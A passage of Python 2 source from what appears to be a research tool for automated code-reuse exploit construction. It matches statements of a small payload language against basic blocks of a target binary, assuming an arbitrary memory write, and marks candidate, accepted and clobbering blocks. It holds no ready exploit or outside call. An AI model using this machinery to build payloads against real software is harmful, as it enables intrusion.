\n                                                (stmt['reg'], reg, data['const']) )\n\n                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:\n                                self.__rg.add_edge('__r%d' % stmt['reg'], reg)\n                            \n                            # a candidate block has found\n                            match.append( {'reg':reg, 'deps':[]} )\n\n\n                        # if there's no concrete value, check for dereferences\n                        elif data['type'] == 'deref' and self.__imm_addr(data['addr'], abstr):\n\n                            dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s = [%s]\" % \n                                                (stmt['reg'], reg, data['addr']) )\n\n                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:\n                                self.__rg.add_edge('__r%d' % stmt['reg'], reg)\n\n                            # a candidate block has found\n                            match.append( {'reg':reg, 'addr':data['addr'].shallow_repr(), \n                                            'sym':data['sym'],\n                                            'deps':data['deps'], # 'mem':(data['addr'], stmt['val'])                                            \n                                            } )\n\n\n                            for a, b in abstr['symvars'].iteritems():\n                                # SYM2ADDR[a] = b\n\n                                SYM2ADDR[a.shallow_repr()] = b\n                                STR2BV[a.shallow_repr()] = a\n\n                            # Initially, varmap was designed to work with integers as addresses and\n                            # all modules operate under this assumption. However, when we store\n                            # bitvectors instead of integers, code starts throwing exceptions.\n                            #\n                            # To fix that, we do a very nasty trick: We store bitvectors as strings\n                            # (so there are no exceptions anymore) and we map those strings to the\n                            # real bitvectors in a global dictionary, so later on we can recover \n                            # the initial bitvectors.\n                            STR2BV[ data['addr'].shallow_repr() ] = data['addr']\n\n\n                            # ok forget about dependencies for now...\n\n                \n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'regset' and isinstance(stmt['val'], tuple):\n\n                    #\n                    for reg, data in abstr['regwr'].iteritems():\n                    #    print '&&',  reg, data\n\n                        # apply register filter\n                        if not self.__reg_filter(reg): continue\n\n\n                        if data['type'] == 'concrete' and data['writable'] == True:\n\n\n                            dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s = 0x%x (%s)\" % \n                                                (stmt['reg'], reg, data['const'], stmt['val'][0]))\n\n                            '''\n                            dbg_prnt(DBG_LVL_0, \"Statement match! (__r%d) %%%s = 0x%x (%s)\" % \n                                                (stmt['reg'], reg, data['const'], stmt['val'][0]))\n                            print '\\t', 'ADDR', hex(addr)                            \n                            print '\\t', data\n                            print '\\t', abstr['conwr']\n                            print '\\t', abstr['memwr']\n                            print '\\n\\n'\n\n                            # apply abstraction to the basic block that starts at \"addr\"\n                            abstr = A.abstract_ng(self.__proj, 0x403fa2)\n\n                            print '^^^^^^^^^^^^^^^^^^^^^^'\n                            abstr = A.abstract_ng(self.__proj, 0x40400A)\n                            \n                            exit()\n\n                            '''\n\n                            # Abstraction is a process that needs to be done only once. \n                            if not self.__rg.has_edge('__r%d' % stmt['reg'], reg):\n                                var = set()\n                            else:               \n                                # get edge dict (if no edge dict = None)\n                                var = self.__rg.get_edge_data('__r%d' % stmt['reg'], reg)\n                                var = var['var']\n\n\n                            # print '============================>', var\n                            var.add( (stmt['val'][0], data['const']) )\n\n\n                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] or\\\n                                self.__rg.has_edge('__r%d' % stmt['reg'], reg):\n                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg, var=var)\n\n                            # a perfect match has found (with this address)\n                            match.append( {'reg':reg, 'addr':data['const'], 'deps':[]} )\n\n\n                            # use a set because we don't want duplicate addresses\n                            self.varmap.setdefault( data['const'], \n                                        set([])).add( (data['const'], reg) )\n\n   \n                        # if there's no concrete value, check for dereferences\n                        elif data['type'] == 'deref' and self.__imm_addr(data['addr'], abstr):\n                            pass\n                            \n                            dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s = [%s] (%s)\" % \n                                                (stmt['reg'], reg, data['addr'], stmt['val'][0]))\n\n                            # ----------------------------------------------------------- \n                            # Apply an optimization to reduce the large number of derefs.\n                            # Ignore weird addresses that very unlikely to give a solution\n                            # Yes we may miss some solutions, but the probability is very\n                            # small.\n                            # -----------------------------------------------------------\n                            blacklist = ['SignExt', 'symbolic_read_unconstrained', 'Reverse', 'stack_']\n                            skip = False\n\n                            for word in blacklist:\n                                if word in data['addr'].shallow_repr():\n                                    skip = True\n                                    dbg_prnt(DBG_LVL_3, \"blacklisted address '%s'\" % \n                                                            data['addr'].shallow_repr())\n                                    break\n\n\n                            # Initially, varmap was designed to work with integers as addresses and\n                            # all modules operate under this assumption. However, when we store\n                            # bitvectors instead of integers, code starts throwing exceptions.\n                            #\n                            # To fix that, we do a very nasty trick: We store bitvectors as strings\n                            # (so there are no exceptions anymore) and we map those strings to the\n                            # real bitvectors in a global dictionary, so later on we can recover \n                            # the initial bitvectors.\n                            if not skip:\n                                STR2BV[ data['addr'].shallow_repr() ] = data['addr']\n\n                                # here we a have a double pointer...\n                                addrstr = '*' + data['addr'].shallow_repr()\n\n\n                                if not self.__rg.has_edge('__r%d' % stmt['reg'], reg):\n                                    var = set()\n                                else:               \n                                    # get edge dict (if no edge dict = None)\n                                    var = self.__rg.get_edge_data('__r%d' % stmt['reg'], reg)\n\n                                    # var['var'] can be empty on regmod\n                                    var = var['var'] if 'var' in var else set()\n\n\n                                # -------------------------------------------------------\n                                # Optimization #2:\n                                #\n                                # The same variables can have mappings to many different addresses,\n                                # that are essentially the same. For example:\n                                #   argv <-> '*<BV64 rsi_22784_64>' \n                                #            '*<BV64 rsi_41354_64>' \n                                #            '*<BV64 rsi_29142_64>'\n                                #\n                                # IN a\n                                # -------------------------------------------------------\n                                sym = data['sym']\n\n                                addrstr, sym = self.__mk_unique(addrstr, data['sym'])\n\n\n                                # store addrstr as a tuple to distinguish it from variables\n                                # print '============================>', var\n                                var.add( (stmt['val'][0], (addrstr,)) )\n\n\n                                if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] or\\\n                                    self.__rg.has_edge('__r%d' % stmt['reg'], reg):\n                                        self.__rg.add_edge('__r%d' % stmt['reg'], reg, var=var)\n\n\n                                # a match has found (with this address)\n                                match.append( {'reg':reg, 'addr':addrstr, 'deps':data['deps'], \n                                                'sym':sym\n                                                # 'mem':(data['addr'], stmt['val'])\n                                                } )\n\n                                for a, b in abstr['symvars'].iteritems():\n                                    SYM2ADDR[a.shallow_repr()] = b\n\n                                    STR2BV  [a.shallow_repr()] = a\n\n\n                                # use a set because we don't want duplicate addresses\n                                self.varmap.setdefault(addrstr, set([])).add( (addrstr, reg) )\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'regmod'\n                #\n                # {'uid': 18, 'type': 'regmod', 'reg': 6, 'op': '+', 'val': 17712}\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'regmod':\n\n                    for reg, data in abstr['regwr'].iteritems():\n                     #   print '{',  reg, data\n\n                        # apply register filter\n                        if not self.__reg_filter(reg): continue\n\n                        if data['type'] == 'mod' and data['op'] == stmt['op'] and \\\n                           data['const'] == stmt['val']:\n\n                                # match!\n                                dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s %s= 0x%x\" % \n                                                (stmt['reg'], reg, data['op'], data['const']))\n                                               \n\n                                if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:\n                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg)\n\n                                match.append( reg ) # a perfect match has found\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'memrd'\n                #\n                #  {'mem': 0, 'type': 'memrd', 'uid': 6, 'reg': 1}\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memrd':\n                \n                    for reg, data in abstr['regwr'].iteritems():\n\n                        # apply register filter\n                        if not self.__reg_filter(reg): continue\n\n                        # TODO: data['memrd'] == MEMORY_LOADSTORE_SIZE\n                        if data['type'] == 'deref' and data['memrd']:\n\n                            loadreg = data['deps'][0]\n\n                            # match!\n                            dbg_prnt(DBG_LVL_3, \"Statement match! (__r%d) %%%s = *(__r%d) %%%s\" % \n                                            (stmt['reg'], reg, stmt['mem'], loadreg))\n                                  \n\n                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] and \\\n                               'immutable' not in self.__rg.node['__r%d' % stmt['mem']]:\n                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg)\n                                    self.__rg.add_edge('__r%d' % stmt['mem'], loadreg)\n\n\n                            # a perfect match has found\n                            match.append( (reg, loadreg) )\n        \n\n                # -----------------------------------------------------------------------\n                # Statement 'memwr'\n                #\n                # {'uid': 6, 'type': 'memwr', 'mem': 2, 'val': 1}\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memwr':\n                    \n                    for memwr in abstr['splmemwr']:\n                        print 'MEMWR', memwr\n                        # apply register filters\n                        if not self.__reg_filter(memwr['mem']) or \\\n                           not self.__reg_filter(memwr['val']):\n                                continue\n\n\n                        # TODO: memwr['size'] == MEMORY_LOADSTORE_SIZE\n                    \n                        # match!\n                        dbg_prnt(DBG_LVL_3, \"Statement match! *(__r%d) %%%s = (__r%d) %%%s\" % \n                                        (stmt['mem'], memwr['mem'], stmt['val'], memwr['val']))\n                              \n\n                        if 'immutable' not in self.__rg.node['__r%d' % stmt['mem']] and \\\n                           'immutable' not in self.__rg.node['__r%d' % stmt['val']]:\n                                self.__rg.add_edge('__r%d' % stmt['mem'], memwr['mem'])\n                                self.__rg.add_edge('__r%d' % stmt['val'], memwr['val'])\n\n\n                        # a perfect match has found\n                        match.append( (memwr['mem'], memwr['val']) )\n        \n\n                # -----------------------------------------------------------------------\n                # Statement 'call'\n                #\n                # {'uid': 22, 'type': 'call', 'name': 'puts', 'args': [0], 'dirty': ['rax']}\n                #\n                # TODO: Comment is from old SPL\n                #\n                # for SYSCALL and LIBCALL statements, we only care about the name:If name \n                # matches with this one in IL statement then we have a match. We assume that\n                # library calls, follow the standard calling convetions and all of their \n                # arguments are stored on registers. Therefore both syscalls and libcalls \n                # use fixed registers native registers, that we can take their values from\n                # REGSET/REGMOD statements.\n                #\n                # However, how do we check if the arguments have the desired value? Consider\n                # for example the following basic block:\n                #       ...\n                #       mov  rdi, 7\n                #       call exit\n                #\n                # Also assume that we have the following SPL statement:\n                #       __r0 = 5;\n                #       exit( __r0 );\n                #\n                # In this case this basic block cannot be used for this system call as the\n                # argument (7) is different from the desired (5). However this basic block\n                # is marked as good for the 2nd statement and as bad for 1st. Thus, we can't\n                # really use this block for the call, as it destroys the 1st statement.\n                #\n                # Thus all we have to do is to match the call name and let the route building\n                # algorithm to decide whether this block can be actually used for the call.\n                # This small demonstration shows how different parts of the algorithm\n                # integrate each other, thus giving us an elegant design :)\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'call':\n\n                    # WARNING: ab.funcall() returns the name of the function. If binary is not \n                    # stripped, ab.funcall() returns also names from user defined functions. Thus,\n                    # we may have some confusion betwee library function names and user defined \n                    # functions.\n                    if abstr['call'] and abstr['call']['name'] == stmt['name']:\n                        dbg_prnt(DBG_LVL_3, \"%s match! %s()\" % (abstr['call']['type'], stmt['name']))\n\n                        match = [ stmt['name'] ]    # make it a list for mark_accepted()\n                        \n\n\n                        # A call reveals a register mapping. For example the only way to \n                        # execute the SPL statement \"puts(__r2)\", is by mapping __r2 to rdi\n                        # \n                        # So we go back to the register graph (__rg) and we drop all unnecessary\n                        # edges from it (otherwise, we'll try mappings that are impossible to\n                        # give a solution),\n                        #\n                        # To prevent future candidate blocks to add new mappings for that register,\n                        # we mark the register node in __rg as 'immutable', so no new edges can\n                        # be added.\n                        #\n                        \n                        # Callign conventions:\n                        #       System V AMD64 ABI: rdi, rsi, rdx, rcx, r8, r9\n                        #       x64 Syscall       : rdi, rsi, rdx, r10, r8, r9\n\n                        # get calling convention (syscalls have different CC)\n                        if find_syscall(stmt['name']):\n                            rsv = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']\n                        else:\n                            rsv = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']\n\n                        for hw, vr in zip(rsv, stmt['args']):\n                            \n                            # make node immutable\n                            nx.set_node_attributes(self.__rg, 'immutable', {'__r%d' % vr:1})\n\n                            # drop all edges but the one used by calling convention\n                            for reg in self.__rg.neighbors('__r%d' % vr):\n                                if reg != hw:\n                                    self.__rg.remove_edge('__r%d' % vr, reg)\n\n                        \n                            # if there's no edge, add it\n                            if not self.__rg.has_edge('__r%d' % vr, hw):\n                                self.__rg.add_edge('__r%d' % vr, hw, var=set())\n\n                            # a perfect match has found (with this address)\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'cond'\n                #\n                # {'uid':30, 'type':'cond', 'reg':0, 'op':'>=', 'num':'0x3243', 'target':'@__26'}\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'cond':\n                    # print abstr['cond']\n                    try:\n                        if abstr['cond'] and abstr['cond']['op'] == stmt['op'] and \\\n                            abstr['cond']['const'] == stmt['num']:\n\n                                # apply register filter\n                                if self.__reg_filter(abstr['cond']['reg']):\n\n                                    dbg_prnt(DBG_LVL_3, \"Conditional jump match! (__r%d) %%%s\" % \n                                                        (stmt['reg'], abstr['cond']['reg']))\n\n                                    # make it a list\n                                    match = [ abstr['cond']['reg'] ]\n\n                    except KeyError:\n                        pass\n                \n                # -----------------------------------------------------------------------\n                # Statement 'jump' or 'return'\n                #\n                # Just ignore them\n                # -----------------------------------------------------------------------\n                else: \n                    pass\n\n                if len(match) > 0:                  # if statement was good add it to the good set\n                    cand.append( (stmt['uid'], match) )\n        \n\n            if len(cand) > 0:                       # if block is good for at least 1 statement\n                dbg_arb(DBG_LVL_3, \"Block 0x%x is candidate when:\" % addr, cand )\n\n                # add \"cand\" attribute to that block (node)\n                self.__cfg.graph.add_node(self.__m[addr], cand=cand)\n\n\n            counter += 1\n\n          #  break          \n\n\n        # ---------------------------------------------------------------------\n        # Check for forced variable mappings last\n        # ---------------------------------------------------------------------\n        if forced_mapping:\n            dbg_prnt(DBG_LVL_1, \"Applying forced (variable) mapping ...\")\n\n            warn(\"No check is made against arguments! %s\" % str(forced_mapping))\n\n            # self.__rg is empty\n            for fvar, fval in forced_mapping:\n                # TODO: check if vr is in the form __r[0-7]\n                if re.search(r'^__r.*', fvar):       # check variables only\n                    continue\n\n                \n                # iterate over edges\n                for _, _, Vg in self.__rg.edges(data=True):                        \n                    if 'var' not in Vg:\n                        continue        \n\n                    for var, val in set(Vg['var']):\n                        # print var, fvar, val, fval\n                        if var == fvar:\n                            if isinstance(val, tuple) and val[0] != fval:\n                                Vg['var'].remove( (var, val) )\n\n                            elif isinstance(val, long) and str(val) != fval:                                \n                                Vg['var'].remove( (var, val) )\n\n\n\n        # -------------------------------------------------------------------------------\n        # check if you have a sufficient number of candidate blocks\n        # -------------------------------------------------------------------------------\n        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%', len(self.__ir)\n        # for i,j in self.__rg.edge.iteritems(): print i, j\n\n        cnt = set()\n\n        for n, c in nx.get_node_attributes(self.__cfg.graph,'cand').iteritems(): \n            # print '0x%x' % n.addr, c\n\n            for a, _ in c:\n                cnt.add( a )\n\n\n        if len(cnt) < self.__ir.nreal:\n            print len(cnt), cnt \n            print self.__ir.nreal\n            error(\"Not enough candidate blocks\")\n            return False\n\n\n\n        # print self.vartab\n        # print self.varmap\n        # for i,j in self.varmap.iteritems():\n        #       print i, [(hex(j), k) for j, k in j]\n\n        self.map_graph = self.__rg\n        \n        # for edge in self.map_graph.edges(data=True):\n        #     print edge\n\n        # for node in self.map_graph.nodes(data=True):\n        #     print node\n\n        # print self.__rg.edges()\n\n        # print variable mappings \n        for u, v, w in self.__rg.edges(data=True):\n            if 'var' not in w:\n                continue\n\n            dbg_prnt(DBG_LVL_3, 'Variable mappings for register mapping %s <-> %s' % (u,v))\n            for ctr, (var, val) in enumerate(w['var']):\n                dbg_prnt(DBG_LVL_3, \"\\t#%03d '%s' <-> '%s'\" % (ctr, var, val))\n\n        return True\n\n\n\n    # --------------------------------------------------------------------------------------------- \n    # mark_accepted(): Given a register and a variable mapping, this function identifies the\n    #       subset of candidate basic blocks that can be truly used to execute SPL statements\n    #       (i.e., accepted basic blocks).\n    #\n    # :Arg rmap: A list of (virtual reguster, hardware register) mappings\n    # :Arg vmap: A list of (variable, address) mappings\n    # :Ret: If there are enough accepted blocks, function returns a tuple with:\n    #       1) a dictionary that has a list of all accepted basic blocks for each \"real\" statement. \n    #       2) rsvp. TODO: Fill in.\n    #\n    # Otherwise, function returns None.\n    #\n    def mark_accepted( self, rmap, vmap ):\n        dbg_prnt(DBG_LVL_1, \"Searching for accepted basic blocks...\")\n\n        # clear potential leftovers from previous attempts\n        for node, _ in nx.get_node_attributes(self.__cfg.graph,'acc').items(): \n            del self.__cfg.graph.node[node]['acc']\n\n\n        rmap = { vr:hw    for vr,hw    in rmap }    # cast them to dictionaries to ease searching\n        vmap = { var:addr for var,addr in vmap }\n\n        cnt = set()\n    \n\n        accepted = { }                              # dictionary of lists\n        rsvp = { }                                  # reserved memory slots\n        \n\n        # iterate over candidate basic blocks\n        #\n        # <CFGNode main+0xff 0x4007e6L[24]> [(4, ['rax']), (3, [('rsi', 576460752303358064L)])]\n        for node, attr in nx.get_node_attributes(self.__cfg.graph,'cand').iteritems(): \n            # dbg_prnt(DBG_LVL_3, \"Analyzing candidate block at 0x%x...\" % node.addr)\n       \n\n            acc = []\n\n            for stmt, cand in [(self.__ir[uid], c) for (uid, cand) in attr for c in cand]:\n\n                # \"varset\", \"label\", \"jump\" and \"return\" are not real statements and therefore\n                # they do not require an accepted block.\n\n                # print '--->', cand, stmt, attr\n\n                # -----------------------------------------------------------------------\n                # Statement 'regset'\n                #\n                # Examples of 'cand':\n                #   {'reg': 'rax', 'deps': ['rsi'], 'addr': '<BV64 rsi_674_64>'},\n                #   {'reg': 'rsp', 'deps': [], 'addr': 576460752303357928L}]\n                #   {'reg': 'rax', 'deps': []}\n                # -----------------------------------------------------------------------\n                if stmt['type'] == 'regset':\n                    isok = False\n\n\n                    # check if register matches\n                    if rmap[ '__r%d' % stmt['reg'] ] == cand['reg']:\n                        # case #1: rax = 10\n                        if 'addr' not in cand:\n                            # block is accepted\n                            acc.append( stmt['uid'] )\n                            isok = True\n\n\n                        # case #2: rax = 0x7fffffffffeffe8\n                        elif isinstance(cand['addr'], long):\n                            if vmap[ stmt['val'][0] ] == cand['addr']:\n                                acc.append( stmt['uid'] )\n                                isok = True\n\n\n                        # case #3: rax = [rsi + 0x10], *(rsi + 0x10) = 10\n                        # case #4: rax = [rsi + 0x10], *(rsi + 0x10) = 0x7fffffffffeffe8                        \n                        elif isinstance(cand['addr'], str):\n                            acc.append( stmt['uid'] )\n                            isok = True\n\n                            rsvp.setdefault(node.addr, []).append( \n                                (stmt['uid'], cand['addr'], cand['sym'], stmt['val']) \n                            )\n\n                        # print '   $ $ $ $ $ $ $ $ RSVP:   ', rsvp[node.addr]\n\n\n                    # TODO: make dependencies time-sensitive &  explain why it doesn't work\n                    if isok and cand['deps']:      # are there dependencies?\n                        pass\n                        # make sure that dependencies are not reserved registers\n                        if filter(lambda reg: reg in cand['deps'], rmap.values()):\n                            pass\n \n                            # this block uses a reserved register. It cannot be accepted for that\n                            # statement\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'regmod'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'regmod':\n                    if rmap['__r%d' % stmt['reg']] == cand:\n                        acc.append( stmt['uid'] )\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'memrd'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memrd':                                      \n                    if (rmap['__r%d' % stmt['reg']], rmap['__r%d' % stmt['mem']]) == cand:\n                        acc.append( stmt['uid'] )\n\n                \n                # -----------------------------------------------------------------------\n                # Statement 'memwr'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memwr':\n                    if (rmap['__r%d' % stmt['mem']], rmap['__r%d' % stmt['val']]) == cand:\n                        acc.append( stmt['uid'] )\n\n                           \n                # -------------------------------------------------------------------------                     \n                # Statement 'call'\n                #\n                # Here, we make all 'call' candidate blocks accepted and we let the \n                # regset/regmod statements to make the clobbering\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'call':\n                    acc.append( stmt['uid'] )\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'cond'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'cond':\n                    # this basic block is already candidate so no need for further checks                    \n                    if rmap[ '__r%d' % stmt['reg'] ] == cand:\n                        acc.append( stmt['uid'] )\n            \n\n            if len(acc) > 0:\n                dbg_prnt(DBG_LVL_4, \"Block 0x%x is accepted for statement(s): %s\" %\n                                      (node.addr, ', '.join(sorted(map(str, acc))) ) )\n                \n                self.__cfg.graph.node[node]['acc'] = acc\n                \n                for a in acc:           \n                    accepted.setdefault(a, []).append(node.addr)\n\n                cnt |= set(acc)\n\n\n\n        # print 'accepted', accepted\n\n\n        # -------------------------------------------------------------------------------\n        # check if there are accepted blocks for all statements\n        # -------------------------------------------------------------------------------\n        if len(cnt) < self.__ir.nreal:\n            #fatal(\"Not enough candidate blocks\")\n            dbg_prnt(DBG_LVL_1, \"There are not enough accepted basic blocks. Much sad :(\")\n            return None, None                       # failure x(\n\n       \n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n        return accepted, rsvp                       # success!\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # mark_clobbering(): Given a register and a variable mapping, this function identifies the set\n    #       of clobbering basic blocks. Note that an accepted block can also be clobbering.\n    #\n    # :Arg rmap: A list of (virtual reguster, hardware register) mappings\n    # :Arg vmap: A list of (variable, address) mappings\n    # :Ret: TODO!!\n    #       \n    def mark_clobbering( self, rmap, vmap ):\n        dbg_prnt(DBG_LVL_1, \"Searching for clobbering basic blocks...\")\n\n        rmap = dict( map(reversed, rmap) )          # cast them to dictionaries to ease searching\n        vmap = dict( map(reversed, vmap) )          # (reverse mappings)\n\n\n        # clear potential leftovers from previous attempts\n        for node, _ in nx.get_node_attributes(self.__cfg.graph,'clob').items(): \n            del self.__cfg.graph.node[node]['clob']\n\n\n        clobbering = { }\n\n        nnodes  = self.__blk_cnt(self.__avoid)\n        counter = 1\n        \n        # iterate over all abstracted basic blocks\n        # (__blk_iter() might return different results for 'node and 'block' methods!)\n        for node, abstr in self.__blk_iter(self.__avoid, 'abstract'):\n            # dbg_prnt(DBG_LVL_3, \"Analyzing block at 0x%x (%d/%d)...\" % (addr, counter, nnodes))\n\n            # if node.addr != 0x416A66 and node.addr != 0x404eec:\n            #       continue\n\n            clob = set()                            # set of clobbering statements\n\n            #\n            # Question: Is block B clobbering for statement S?\n            #\n            # Clobbering blocks are dynamic. Write more...\n            #\n            try:\n                acc = self.__cfg.graph.node[node]['acc']\n            except KeyError:\n                acc = []\n\n\n            for stmt in self.__ir:\n                #\n                # statements 'call', 'cond', 'jump' and 'return' never have clobbering blocks\n                # only 'varset', 'regset' and 'regmod' affect the others (like 'call')\n                #\n                \n                # -----------------------------------------------------------------------\n                # Statement 'varset'\n                #\n                # Due to the AWP, all variables are set ahead, so any basic block that \n                # modified any of the reserved memory addreses is a clobbering block\n                # -----------------------------------------------------------------------\n                if stmt['type'] == 'varset':\n                    # print '---------', vmap\n                    # for addr, size in abstr['conwr']:\n                    for addr, ex in abstr['memwr']:\n                        # print addr, ex\n                        if addr.shallow_repr() in vmap and vmap[addr.shallow_repr()] == stmt['name']:\n                            # block is clobbering\n                            print hex(node.addr), 'clob for varset'\n                            clob.add(stmt['uid'])\n                            fatal('I should come back to that')\n                            '''\n                            'memwr': set([\n                                (<SAO <BV64 0x7fffffffffeffb0>>, <SAO <BV64 0x40f5a5>>), \n                                (<SAO <BV64 0x7fffffffffeffd0>>, <SAO <BV64 r12_48109_64>>), \n                                (<SAO <BV64 0x7fffffffffeffc0>>, <SAO <BV64 rbx_48100_64>>), \n                                (<SAO <BV64 0x7fffffffffeffe8>>, <SAO <BV64 r15_48112_64>>), \n                                (<SAO <BV64 0x7fffffffffeffc8>>, <SAO <BV64 0x7ffffffffff01f0>>), \n                                (<SAO <BV64 0x7fffffffffeffd8>>, <SAO <BV64 r13_48110_64>>), \n                                (<SAO <BV64 0x7fffffffffeffe0>>, <SAO <BV64 r14_48111_64>>)]), \n\n                            'conwr': set([\n                                (576460752303357888L, 64), \n                                (576460752303357896L, 64), \n                                (576460752303357928L, 64), \n                                (576460752303357904L, 64), \n                                (576460752303357872L, 64), \n                                (576460752303357912L, 64), \n                                (576460752303357920L, 64)])}\n                            '''\n                        # Check rsvp here? (and not during search?) Not sure :\\\n\n                        #\n                        # TODO: use 'size' and check for overlaps (e.g, vmap is X, but addr is X+1)\n                        #\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'regset' or 'regmod'\n                #\n                # register of 'clob' type are always clobbering\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'regset' or stmt['type'] == 'regmod':\n                    #for reg in [r for r in abstr['regwr'].keys() if 1]:\n                    for reg in abstr['regwr'].keys():\n\n                       # print reg, stmt, acc\n\n                        # if register is being written and block is not accepted, then it's \n                        # clobbering \n                        if reg in rmap and rmap[reg] == '__r%d' % stmt['reg'] \\\n                            and stmt['uid'] not in acc:\n                        # rmap[reg] != '__r%d' % stmt['reg']:\n                                clob.add(stmt['uid'])\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'memrd'                \n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memrd':                    \n                    for reg in abstr['regwr'].keys():\n                        if reg in rmap and \\\n                            (rmap[reg] == '__r%d' % stmt['reg'] or \\\n                             rmap[reg] == '__r%d' % stmt['mem']) \\\n                             and stmt['uid'] not in acc:\n                        \n                                clob.add(stmt['uid'])\n\n                \n                # -----------------------------------------------------------------------\n                # Statement 'memwr'\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'memwr':                    \n                    for reg in abstr['regwr'].keys():\n                        if reg in rmap and \\\n                            (rmap[reg] == '__r%d' % stmt['mem'] or \\\n                             rmap[reg] == '__r%d' % stmt['val'])\\\n                             and stmt['uid'] not in acc:                        \n                                clob.add(stmt['uid'])\n\n\n                # -----------------------------------------------------------------------\n                # Statement 'call'\n                #\n                # Check dirty registers (optional)\n                # -----------------------------------------------------------------------\n                elif stmt['type'] == 'call':\n                    pass\n\n\n                # -----------------------------------------------------------------------\n                # Other statements\n                # -----------------------------------------------------------------------\n                else:\n                    pass\n\n\n            # ---------------------------------------------------------------------------\n            # In some cases, we have to relax the \"clobbering\" definition. For instance\n            # if we set a register twice, or if when we modify a register (e.g. __r2 -= 1)\n            # in an SPL payload, the 2nd assigment will be clobbering for the 1st according\n            # to our definition of clobbering blocks. However, we will end up finding no \n            # solution as the 2nd accepted blocks will always be clobbering for\n            # the first.\n            #\n            # Such SPL statements are clobbering by themselves, so we have to go back on\n            # the list of clobbering blocks and remove them.\n            # ---------------------------------------------------------------------------\n            clob_l = list(clob)\n            \n            for s2 in clob_l:\n                for s1 in acc:\n\n                    if self.__is_clobbering(self.__ir[s1], self.__ir[s2]):    \n                        clob.remove(s2)                \n                        break\n\n\n\n\n            # ---------------------------------------------------------------------------\n            # Check dirty registers. 'dirty': ['rax', 'rcx', 'rdx']\n            #\n            # There will be a single basic block after syscall. Mark it as clobbering for\n            #       all registers in 'dirty' list\n            #\n            # Update: This is not needed at all. If registers/memory gets modified inside\n            # the lib/sys call then solution will be discarded by simulation, as these\n            # addresses/registers are marked as immutable, so any violation will\n            # result in discarding current solution.\n            #\n            # UPDATE 2: It is fixed :) (check immutable registers / simulation modes)\n            # \n            # However, a check here, can be used as an optimization, as we can discard\n            # solutions earlier.\n            # ---------------------------------------------------------------------------\n            if len(clob) > 0:\n                dbg_prnt(DBG_LVL_4, \"Block 0x%x (%d/%d) is clobbering for statement(s): %s\" %\n                                     (node.addr,  counter, nnodes, # pretty_list(clob, ', ', dec)))                \n                                                         ', '.join(sorted(map(str, clob)))) )\n                \n                self.__cfg.graph.node[node]['clob'] = clob\n                \n                for c in clob:          \n                    clobbering.setdefault(c, []).append(node.addr)\n\n\n            counter += 1\n\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n        # print clobbering\n        # print self.rsvp\n        # exit()\n\n        return clobbering\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_stmt_regs(): This function gets all registers that are being used in a statement.\n    #\n    # :Arg stmt: The statement to get registers from.\n    # :Ret: A list of all registers (int) that are being used by the statemet\n    \n    def __get_stmt_regs( self, stmt ):\n        if   stmt['type'] == 'regset': return [stmt['reg']]\n        elif stmt['type'] == 'regmod': return [stmt['reg']]\n        elif stmt['type'] == 'memrd' : return [stmt['reg'], stmt['mem']]\n        elif stmt['type'] == 'memwr' : return [stmt['mem'], stmt['val']]\n        elif stmt['type'] == 'call'  : return [] # stmt['args']\n        elif stmt['type'] == 'cond'  : return [stmt['reg']]\n        else:\n            return []\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __is_clobbering(): Check whether SPL statement s2 is clobbering for SPL statement s1.\n    #\n    # :Arg s1: The first SPL statement\n    # :Arg s2: The second SPL statement\n    # :Ret: If statement s2 is clobbering with statement s1 function returns True. Otherwise it\n    #       returns False.\n    #       \n    def __is_clobbering( self, s1, s2 ):   \n        # TODO: That's not totally correct for complex SPL payloads, but it works for now\n        #\n        #        if  (s1['type'] == 'regset' or s1['type'] == 'regmod') and \\\n        #            (s2['type'] == 'regset' or s2['type'] == 'regmod'):\n        #                if s1['reg'] == s2['reg']:\n        #                    return True\n        #\n        # TODO: Add statements for memrd/memwr!!! IMPORTANT!!!\n\n        s1_regs = set(self.__get_stmt_regs(s1))\n        s2_regs = set(self.__get_stmt_regs(s2))\n\n\n        if (s1_regs & s2_regs): # and s2['uid'] > s1['uid']:\n            return True\n\n        return False\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
